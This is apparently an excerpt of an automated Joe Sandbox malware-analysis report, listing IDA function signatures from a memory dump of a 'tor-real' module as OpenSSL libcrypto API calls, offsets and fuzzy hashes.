                                                                            • Opcode Fuzzy Hash: e196b57b13a76c28dd59f7503b2af24c71797f143e8526b8a662a7bc0547a7c7
                                                                            • Instruction Fuzzy Hash: 24F0B2B5A487048FC704AFAAC48055EFBF0BB88718F918E1DE4D8A7700D734E9468F46
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_free$H_freeH_set0_pqgN_get_rfc3526_prime_8192
                                                                            • String ID:
                                                                            • API String ID: 1947367523-0
                                                                            • Opcode ID: 1cda43bcd87b7c046a01fc50346082c9cb59d15289f4a89f37d5f8be13dd8944
                                                                            • Instruction ID: 1fa527e6863209ec71e425a8baa799a40ebd54285c145bc3aa7875019605ed9f
                                                                            • Opcode Fuzzy Hash: 1cda43bcd87b7c046a01fc50346082c9cb59d15289f4a89f37d5f8be13dd8944
                                                                            • Instruction Fuzzy Hash: EFE065B258D7154FD3012F74A88035EFBD0EF8862CF41882DD59897B00D334A4094B86
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_free$H_freeH_set0_pqgN_get_rfc3526_prime_4096
                                                                            • String ID:
                                                                            • API String ID: 946563573-0
                                                                            • Opcode ID: f761af2d1a518544cd6208dba5d3f2155aa29819a14ff6dc8cc43210f8fdb82e
                                                                            • Instruction ID: b9e13531f4022d12992b60781c785f8b70c0c6fe3f74c940dec882ec13dfeaef
                                                                            • Opcode Fuzzy Hash: f761af2d1a518544cd6208dba5d3f2155aa29819a14ff6dc8cc43210f8fdb82e
                                                                            • Instruction Fuzzy Hash: 73E065B258E7154FD3002F74A88035EF7D0EF8862CF41882DD59987B00D334A4094B86
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_free$H_freeH_set0_pqgN_get_rfc2409_prime_1024
                                                                            • String ID:
                                                                            • API String ID: 879964548-0
                                                                            • Opcode ID: 1cda43bcd87b7c046a01fc50346082c9cb59d15289f4a89f37d5f8be13dd8944
                                                                            • Instruction ID: 00516394322b9c9b4b63ed47e12a79aa26afdfcd3140ab2462d770161b78b9cf
                                                                            • Opcode Fuzzy Hash: 1cda43bcd87b7c046a01fc50346082c9cb59d15289f4a89f37d5f8be13dd8944
                                                                            • Instruction Fuzzy Hash: 90E065B258D7154FD3012F74A88036EF7D0EF8862CF41882DD59897B10D334A4094B86
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: P
                                                                            • API String ID: 1452528299-3110715001
                                                                            • Opcode ID: 3f73f0c4fa6185d9174f7caa466ff61994f58a460b56b641efc67c1f8528ff6f
                                                                            • Instruction ID: f8ed00bf7b89fd252baf939a83b5c12f4baa8f91c23c1aaee88787ebbf209fbb
                                                                            • Opcode Fuzzy Hash: 3f73f0c4fa6185d9174f7caa466ff61994f58a460b56b641efc67c1f8528ff6f
                                                                            • Instruction Fuzzy Hash: B7E12974609310CFE7519F28C48078ABBE0FF46308F9659A9E8958BB65C779E880CF52
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 1208671065-307317852
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: P$l
                                                                            • API String ID: 0-638663543
                                                                            APIs
                                                                            • BIO_clear_flags.LIBCRYPTO-1_1 ref: 6C0DC6C3
                                                                            • BIO_set_flags.LIBCRYPTO-1_1 ref: 6C0DC6D3
                                                                            Similarity
                                                                            • API ID: O_clear_flagsO_set_flags
                                                                            • String ID: D$P
                                                                            • API String ID: 3946675294-307317852
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$P$t3
                                                                            • API String ID: 0-293624935
                                                                            APIs
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0459
                                                                            • BIO_write.LIBCRYPTO-1_1 ref: 6C0A048D
                                                                            Similarity
                                                                            • API ID: DigestO_writeUpdate
                                                                            • String ID: D$P
                                                                            • API String ID: 1267058251-307317852
                                                                            APIs
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0E7E43
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0E7E61
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0E7E84
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0E7E94
                                                                            • EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0E7EFD
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E7F31
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E7F61
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E7FA9
                                                                            • EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0E7FF9
                                                                            Similarity
                                                                            • API ID: DigestX_ctrlX_freeY_derive_init$Final_exInit_exX_new
                                                                            • String ID: D$P
                                                                            • API String ID: 636564888-307317852
                                                                            APIs
                                                                            • EVP_MD_CTX_copy_ex.LIBCRYPTO-1_1 ref: 6C0D8DD2
                                                                            Similarity
                                                                            • API ID: X_copy_ex
                                                                            • String ID: D$P$z
                                                                            • API String ID: 774438373-1225762907
                                                                            APIs
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B291A
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B2B49
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B2B6A
                                                                            Similarity
                                                                            • API ID: D_priv_bytes
                                                                            • String ID:
                                                                            • API String ID: 1100307897-3916222277
                                                                            APIs
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C09207C
                                                                              • Part of subcall function 6C0B1080: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0B10B4
                                                                              • Part of subcall function 6C0B1080: CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1 ref: 6C0B10D0
                                                                              • Part of subcall function 6C0B1080: OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0B1173
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C0920C0
                                                                              • Part of subcall function 6C0B3DD0: EVP_CIPHER_CTX_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,6C091E0D), ref: 6C0B3E04
                                                                              • Part of subcall function 6C0B3DD0: EVP_CIPHER_CTX_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,6C091E0D), ref: 6C0B3E20
                                                                              • Part of subcall function 6C0B3DD0: COMP_CTX_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,6C091E0D), ref: 6C0B3E38
                                                                              • Part of subcall function 6C0B3DD0: COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0B3E50
                                                                              • Part of subcall function 6C0B3DD0: EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0B3E68
                                                                              • Part of subcall function 6C0B3DD0: EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0B3E80
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0920E5
                                                                            Similarity
                                                                            • API ID: X_free$D_lock_newL_sk_dupO_ctrlO_freeO_newO_zalloc
                                                                            • String ID: m
                                                                            • API String ID: 3678400241-3775001192
                                                                            APIs
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0E866E
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • EVP_CIPHER_CTX_new.LIBCRYPTO-1_1 ref: 6C0E88C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_cleanseR_put_errorX_new
                                                                            • String ID: A$P
                                                                            • API String ID: 825340233-345673399
                                                                            • Opcode ID: 57bb1233ca5337e80f1c5d0ecd17151fdd92a4c6a2dcc888f4d4862967fa1886
                                                                            • Instruction ID: 3f537dbca07918f8827cb1f2e38cb6d0918828e8078c2e9efcf0da1acee5c94f
                                                                            • Opcode Fuzzy Hash: 57bb1233ca5337e80f1c5d0ecd17151fdd92a4c6a2dcc888f4d4862967fa1886
                                                                            • Instruction Fuzzy Hash: D4F01DB12483418FD310EF19D49079EB7E4AB85318F408D2DDA989B740D77995088F92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$L_sk_findL_sk_freeL_sk_pushR_put_errorstrchrstrncmp
                                                                            • String ID: ]
                                                                            • API String ID: 1493756383-3352871620
                                                                            • Opcode ID: 1a02713e168be257e85220cfbab43eb83507549ef7eea2a1932899ca0c104079
                                                                            • Instruction ID: 56451f2c90033e3ff61b3f8a63da4642c5c247fd0baee1867606fc031418523e
                                                                            • Opcode Fuzzy Hash: 1a02713e168be257e85220cfbab43eb83507549ef7eea2a1932899ca0c104079
                                                                            • Instruction Fuzzy Hash: 52F08CB6A087048FD3009F21D40438ABBF1FB89328F42481DD8EC57340C775A5498F86
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E08B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorX_free
                                                                            • String ID: 4$D$P
                                                                            • API String ID: 82304395-1354974332
                                                                            • Opcode ID: bd02b02c5054441829c877344d7f17f2e2379c8b4f26f06232a26bffc16add17
                                                                            • Instruction ID: ec1651e1f79fef5ebd459d6c9c81069f39042f98482eecada82692286e1a4194
                                                                            • Opcode Fuzzy Hash: bd02b02c5054441829c877344d7f17f2e2379c8b4f26f06232a26bffc16add17
                                                                            • Instruction Fuzzy Hash: 8BE012B22497648ED7009F94E94038EBBE0FB84759F10881EE28857640C77995088FD7
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: qsort
                                                                            • String ID: @
                                                                            • API String ID: 1928336220-2766056989
                                                                            • Opcode ID: c22018e81c25443374314daa21ab3d38c9f9e7c9302c912fb7596acea2cf0fb9
                                                                            • Instruction ID: a16993810bcb497f15e3e56de4faf4d283eddf3836a97efee5bc96a2df235160
                                                                            • Opcode Fuzzy Hash: c22018e81c25443374314daa21ab3d38c9f9e7c9302c912fb7596acea2cf0fb9
                                                                            • Instruction Fuzzy Hash: 12F028F5408384AAD300AF81C11635FBEE0BB81388F51C90CD5D81B665C7BA8489DF9B
                                                                            APIs
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            • strlen.MSVCRT ref: 6C0C0EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zallocstrlen
                                                                            • String ID: 6$D$P
                                                                            • API String ID: 3335338566-704845596
                                                                            • Opcode ID: b635cf2c837d5b24ef8563abcf4960a863f73439b1d55af742fb612b066b9207
                                                                            • Instruction ID: 8095f5377571494eab24e80b3eb9d4a89583f15cbd0d0c28a082a5051fff2fc2
                                                                            • Opcode Fuzzy Hash: b635cf2c837d5b24ef8563abcf4960a863f73439b1d55af742fb612b066b9207
                                                                            • Instruction Fuzzy Hash: 59213BB120D7119BE7009F29D58435FBBE4AF8479CF11881CE8948B740D779D889DB87
                                                                            APIs
                                                                            • OPENSSL_sk_find.LIBCRYPTO-1_1 ref: 6C0A29F1
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2A0E
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2A22
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2ADC
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2B5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_value$L_sk_findL_sk_num
                                                                            • String ID:
                                                                            • API String ID: 2454052373-0
                                                                            • Opcode ID: 50aa4614008e9a9877a36c4cecf8bde5f281216058e8ffcb27661a427e00e986
                                                                            • Instruction ID: 5de87969a9a9b813e2ca88b93a8397cbd4f16e074cf13618e8839558d682b05c
                                                                            • Opcode Fuzzy Hash: 50aa4614008e9a9877a36c4cecf8bde5f281216058e8ffcb27661a427e00e986
                                                                            • Instruction Fuzzy Hash: 5431D4706097418FC750DFAAC18471ABBE0BF88748F518A2DE89897A02D734E886CB46
                                                                            APIs
                                                                            • EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0E2CF3
                                                                            • EVP_PKEY_get0_EC_KEY.LIBCRYPTO-1_1 ref: 6C0E2D02
                                                                            • EC_KEY_get0_group.LIBCRYPTO-1_1 ref: 6C0E2D0E
                                                                            • EC_GROUP_get_curve_name.LIBCRYPTO-1_1 ref: 6C0E2D16
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: P_get_curve_nameY_get0_Y_get0_groupY_id
                                                                            • String ID:
                                                                            • API String ID: 1221970100-0
                                                                            • Opcode ID: a9961eee6877f33c67dcae106497b5073041ac5e2d2c13c446b317c3fa63028f
                                                                            • Instruction ID: 9227c07b8127bc22947e97c0945435e64242a997d266ccae5a2217cbc3395aab
                                                                            • Opcode Fuzzy Hash: a9961eee6877f33c67dcae106497b5073041ac5e2d2c13c446b317c3fa63028f
                                                                            • Instruction Fuzzy Hash: 8B11917068D707CEDF64AF24C5883AAB7E0AF4D348F954D2DCAA68BA50D734E485C781
                                                                            APIs
                                                                            • d2i_X509.LIBCRYPTO-1_1 ref: 6C0BA100
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0BA146
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0BA17D
                                                                              • Part of subcall function 6C0B8500: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B8518
                                                                              • Part of subcall function 6C0B8500: EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B855E
                                                                              • Part of subcall function 6C0B8500: ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0B8563
                                                                              • Part of subcall function 6C0B8500: X509_check_private_key.LIBCRYPTO-1_1 ref: 6C0B857A
                                                                              • Part of subcall function 6C0B8500: X509_free.LIBCRYPTO-1_1 ref: 6C0B8591
                                                                              • Part of subcall function 6C0B8500: X509_up_ref.LIBCRYPTO-1_1 ref: 6C0B8599
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0BA1B1
                                                                              • Part of subcall function 6C0E67A0: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E6601
                                                                              • Part of subcall function 6C0E67A0: EVP_PKEY_security_bits.LIBCRYPTO-1_1 ref: 6C0E6616
                                                                              • Part of subcall function 6C0E67A0: X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0E6657
                                                                              • Part of subcall function 6C0E67A0: X509_get_signature_info.LIBCRYPTO-1_1 ref: 6C0E668B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorX509_freeX509_get0_pubkey$R_clear_errorX509X509_check_private_keyX509_get_extension_flagsX509_get_signature_infoX509_up_refY_copy_parametersY_security_bitsd2i_
                                                                            • String ID:
                                                                            • API String ID: 730711336-0
                                                                            • Opcode ID: 901590a64939aac9114697b0e5aa287a11c872bffb28514432c50d4bab552020
                                                                            • Instruction ID: 8e2031d819e452aeed2710a06aadc7926e1363942e98ea13cde5e819e08b0a37
                                                                            • Opcode Fuzzy Hash: 901590a64939aac9114697b0e5aa287a11c872bffb28514432c50d4bab552020
                                                                            • Instruction Fuzzy Hash: AD11F8B190D3519FD750DF24D48038FBBE0AB88758F118D2DE4D89B750D7B9D9888B92
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C0D86A7
                                                                            • i2d_X509_NAME.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C0D86BD
                                                                              • Part of subcall function 6C094670: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0946A1
                                                                            • i2d_X509_NAME.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D86F7
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C0D8706
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_i2d_$L_sk_numL_sk_valueO_zalloc
                                                                            • String ID:
                                                                            • API String ID: 1323314405-0
                                                                            • Opcode ID: 54f90a45c576b4129db7faa9308d602b887616d54a1797f927e6b88d6afc7751
                                                                            • Instruction ID: 7024ffafd3bf40eb35762f5713b333e40992d69246cfef7326179724eac12129
                                                                            • Opcode Fuzzy Hash: 54f90a45c576b4129db7faa9308d602b887616d54a1797f927e6b88d6afc7751
                                                                            • Instruction Fuzzy Hash: CD115BB16097019FD700AF65C48036EBBF4AF88398F425A2EE8D8D7700E734E5849B83
                                                                            APIs
                                                                            • OPENSSL_sk_find.LIBCRYPTO-1_1 ref: 6C0A29F1
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2A0E
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2A22
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2ADC
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2B5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_value$L_sk_findL_sk_num
                                                                            • String ID:
                                                                            • API String ID: 2454052373-0
                                                                            • Opcode ID: 560e38f106cc058aeb548ed13820229052159dfce215bf50a70c14d2a792b280
                                                                            • Instruction ID: 823111581c965746f3e2115f012921ca9a18481dbb2ed9f582e2331f02df4ce7
                                                                            • Opcode Fuzzy Hash: 560e38f106cc058aeb548ed13820229052159dfce215bf50a70c14d2a792b280
                                                                            • Instruction Fuzzy Hash: D9110D706097418FC315DFA6C18476ABBF1BF89708F654A6DE49997A02D334E886CB06
                                                                            APIs
                                                                            • d2i_PrivateKey.LIBCRYPTO-1_1 ref: 6C0BA8AB
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0BA911
                                                                              • Part of subcall function 6C0B86D0: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B870E
                                                                              • Part of subcall function 6C0B86D0: EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B8722
                                                                              • Part of subcall function 6C0B86D0: ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0B8727
                                                                              • Part of subcall function 6C0B86D0: X509_check_private_key.LIBCRYPTO-1_1 ref: 6C0B873E
                                                                              • Part of subcall function 6C0B86D0: EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B8755
                                                                              • Part of subcall function 6C0B86D0: EVP_PKEY_up_ref.LIBCRYPTO-1_1 ref: 6C0B875D
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0BA8C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Y_free$PrivateR_clear_errorR_put_errorX509_check_private_keyX509_get0_pubkeyY_copy_parametersY_up_refd2i_
                                                                            • String ID:
                                                                            • API String ID: 1926251844-0
                                                                            • Opcode ID: d6043d2c036a6b78d5dc488f2183ba04b5212305c76b35c64b0a31035dfd0988
                                                                            • Instruction ID: f2b1f20fb9f0b03ebd94aaa9bd710c5e87d7ace9d00360431744691ec06c89f9
                                                                            • Opcode Fuzzy Hash: d6043d2c036a6b78d5dc488f2183ba04b5212305c76b35c64b0a31035dfd0988
                                                                            • Instruction Fuzzy Hash: 9711E2B1A183018FC710EF69C48074BBBF0BB89358F51892DE898A7710E735E9458F92
                                                                            APIs
                                                                            • BIO_find_type.LIBCRYPTO-1_1 ref: 6C092104
                                                                            • BIO_find_type.LIBCRYPTO-1_1 ref: 6C09211A
                                                                            • BIO_get_data.LIBCRYPTO-1_1 ref: 6C09212C
                                                                            • BIO_get_data.LIBCRYPTO-1_1 ref: 6C092136
                                                                              • Part of subcall function 6C0AF950: memcpy.MSVCRT ref: 6C0AF9EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_find_typeO_get_data$memcpy
                                                                            • String ID:
                                                                            • API String ID: 2254905940-0
                                                                            • Opcode ID: 04e880e8234d1cb71beb823ff13170292958a1dbf92734f50306bc60a049bd08
                                                                            • Instruction ID: 06cb1c1ac43ba2c71a024705a5a4039137eabbe8531b1ea678c9b255bd2a1dd3
                                                                            • Opcode Fuzzy Hash: 04e880e8234d1cb71beb823ff13170292958a1dbf92734f50306bc60a049bd08
                                                                            • Instruction Fuzzy Hash: EE01A2B06093128FE700AF74988435F77E4AF44A0CF56486DE594D7701E734E818DB92
                                                                            APIs
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A6899
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A68A5
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A68B5
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0A6910
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A691F
                                                                            • OPENSSL_DIR_read.LIBCRYPTO-1_1 ref: 6C0A69E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_set_cmp_funcO_freeR_clear_errorR_readX509_free__stack_chk_fail
                                                                            • String ID:
                                                                            • API String ID: 761802978-0
                                                                            • Opcode ID: ad7bd9b53594eac2b1e15796babe44f98da662b9ea59beecf3ff939bccd34cf1
                                                                            • Instruction ID: 3f0f1535d541fc5b1e231d9c0a1634b2efb308061a5b730d7048e06da409ff6d
                                                                            • Opcode Fuzzy Hash: ad7bd9b53594eac2b1e15796babe44f98da662b9ea59beecf3ff939bccd34cf1
